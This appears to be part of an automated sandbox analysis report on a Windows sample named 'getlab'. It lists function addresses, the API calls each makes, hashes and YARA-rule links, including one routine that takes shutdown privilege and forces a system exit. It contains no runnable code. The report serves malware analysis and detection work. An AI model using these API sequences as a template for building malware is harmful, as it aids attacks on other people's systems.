                                                                          • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                          • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                          • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                          • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                          Function 00407576 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                          • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                          • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                          • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                          Function 00407578 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                          • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                          • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                          • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                          Function 004069DC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                          • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                          • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                          • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                          Function 004076C8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022503AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID:
                                                                          • API String ID: 442123175-0
                                                                          • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                          • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                          • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                          • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                          Function 00407284 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FormatMessage
                                                                          • String ID:
                                                                          • API String ID: 1306739567-0
                                                                          • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                          • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                          • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                          • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                          Function 004076AC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetEndOfFile.KERNEL32(?,02268000,0040A08C,00000000), ref: 004076B3
                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022503AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 734332943-0
                                                                          • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                          • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                          • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                          • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                          Function 00406FFB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                          • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                          • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                          • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                          Function 00407017 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                          • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                          • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                          • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                          Function 00406970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrev
                                                                          • String ID:
                                                                          • API String ID: 122130370-0
                                                                          • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                          • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                          • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                          • Instruction Fuzzy Hash:
                                                                          Function 00407F10 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                          • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                          • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                          • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                          Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                          • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                          • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                          • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                          Function 00407548 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                          • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                          • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                          • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                          Function 00407EB8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                          • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                          • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                          • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654

                                                                          Non-executed Functions

                                                                          Function 00409448 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                          • String ID: SeShutdownPrivilege
                                                                          • API String ID: 107509674-3733053543
                                                                          • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                          • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                          • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                          • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                          Function 00409BEC Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                          • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                          • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                          • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                          • String ID:
                                                                          • API String ID: 3473537107-0
                                                                          • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                          • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                          • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                          • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                          Function 00405248 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                          • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                                          • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                          • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                                          Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: SystemTime
                                                                          • String ID:
                                                                          • API String ID: 2656138-0
                                                                          • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                          • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                          • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                          • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                          Function 00405CE4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Version
                                                                          • String ID:
                                                                          • API String ID: 1889659487-0
                                                                          • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                          • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                          • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                          • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                          Function 0040840C Relevance: .5, Instructions: 545COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                          • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                          • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                          • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                          Function 00407024 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                          Strings
                                                                          Memory Dump Source
